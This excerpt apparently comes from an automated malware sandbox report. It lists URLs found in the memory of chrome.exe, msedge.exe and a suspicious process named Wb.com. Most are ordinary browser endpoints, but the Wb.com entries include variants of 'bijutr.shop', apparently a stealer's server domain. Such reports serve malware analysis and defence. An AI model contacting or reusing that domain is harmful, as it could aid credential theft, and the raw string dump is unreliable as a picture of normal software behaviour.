                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 00000014.00000002.2773585822.000002821A99E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                Source: Wb.com, 0000000C.00000002.3028437270.000000000041D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop
                Source: Wb.com, 0000000C.00000002.3031181433.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop936ed13bd870
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopUVWXYZ1234567890illa
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopart/form-data;
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3028437270.000000000044C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopsh;
                Source: Wb.com, 0000000C.00000002.3032206760.000000000475E000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: Wb.com, 0000000C.00000002.3032206760.000000000475E000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: Reporting and NEL.23.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: chrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                Source: Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, MO8G47.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 00000011.00000002.2641864869.000047E400A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 00000011.00000002.2641864869.000047E400A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 00000011.00000002.2641864869.000047E400A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639001052.000047E40040C000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000011.00000003.2558088225.000047E400D80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2776605861.00005B800237C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 00000011.00000002.2640390437.000047E4006DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000011.00000002.2641749171.000047E400A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2644078986.000047E400F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641065863.000047E400880000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2644398640.000047E4010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000011.00000002.2644398640.000047E4010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en3
                Source: chrome.exe, 00000011.00000002.2644078986.000047E400F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2644398640.000047E4010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enZ
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559467114.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564039810.000047E40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2556314289.000047E40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2560291355.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2556474234.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2565321356.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2558088225.000047E400D80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: msedge.exe, 00000014.00000002.2776605861.00005B800237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.22.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000011.00000002.2643937529.000047E400ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000011.00000002.2643937529.000047E400ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/G
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                Source: chrome.exe, 00000011.00000003.2545749769.00005BAC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2545772575.00005BAC002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640417345.000047E4006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642271555.000047E400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638453727.000047E400290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2775903139.00005B8002240000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000011.00000002.2640262507.000047E400688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Wb.com, 0000000C.00000002.3032206760.000000000475E000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: Wb.com, 0000000C.00000002.3032206760.000000000475E000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000011.00000002.2640446216.000047E400708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
                Source: chrome.exe, 00000011.00000002.2641864869.000047E400A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.23.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: 2cc80dabc69f58b6_0.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.23.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000011.00000002.2638730268.000047E40031C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000011.00000003.2591814642.000047E401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591877343.000047E40153C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591948572.000047E401540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643937529.000047E400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2638730268.000047E40031C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2638730268.000047E40031C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638868900.000047E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641065863.000047E400880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000011.00000002.2641065863.000047E400880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
